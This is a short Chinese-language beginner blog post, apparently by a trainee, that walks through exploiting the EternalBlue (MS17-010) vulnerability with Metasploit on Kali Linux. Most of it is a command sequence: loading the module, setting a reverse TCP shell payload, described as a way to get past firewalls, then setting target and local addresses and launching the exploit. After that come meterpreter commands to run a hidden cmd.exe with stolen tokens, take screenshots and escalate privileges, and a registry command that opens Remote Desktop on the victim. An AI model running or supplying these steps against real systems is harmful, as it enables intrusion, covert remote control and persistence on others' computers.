Metasploit利用永恒之蓝MS17-010 基础

时间:2024-02-23 08:46:35

本人太渣,所以写了这个基础篇供一些小白和新手看,大佬们手下留情。

这是个基础篇。。。。。

这几天在培训第一次接触Metasploit,没有我原来想象中那么麻烦,真的上手很方便  嘻嘻嘻嘻~~~~o(* ̄▽ ̄*)o

kali集成了Metasploit,所以我用的我是kali。打开kali终端,输入msfconsole.等待Metasploit加载。成功之后终端前面会变成这样:msf>

以下是命令以及解释:msf>search ms17-010

//查找metasploit框架中的渗透攻击模块。

msf > use  XXX    //装载一个渗透攻击或模块

msf > show payloads

//输出很多可用的攻击载荷

msf > set payload windows/shell_reverse_tcp        //指定想要使用的攻击载荷。反弹型的链接方式,可以绕过防火墙

 

msf > set RHOST 渗透目标主机的IP地址

 

msf > set LHOST 本机IP

 

msf >show targets

输出各种版本的操作系统代号,根据目标操作系统版本选择。

msf >set target XX

 

msf >show options                    //输出设置清单,可进行修正

 

msf >exploit  或者  run           //没有错误,即可进行攻击了。

进去之后显示 meterpret

分割线啦啦啦啦~~~~~~


常用命令:

execute -f cmd.exe -i              执行cmd.exe命令并进行交互。

execute -f cmd.exe -i -t           以所有可用令牌来执行cmd命令。

execute -f cmd.exe -i -H -t      以所有可用令牌来执行cmd命令并隐藏该进程。

screenshot                              对目标主机的屏幕进行截图。

use priv                                   加载特权提升扩展模块,来扩展meterpreter库。

开启3389端口命令:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
我实例多次,对Windows XP 和2003系统有用的,不用重起,只要对方是外网,行后方可连接3389终端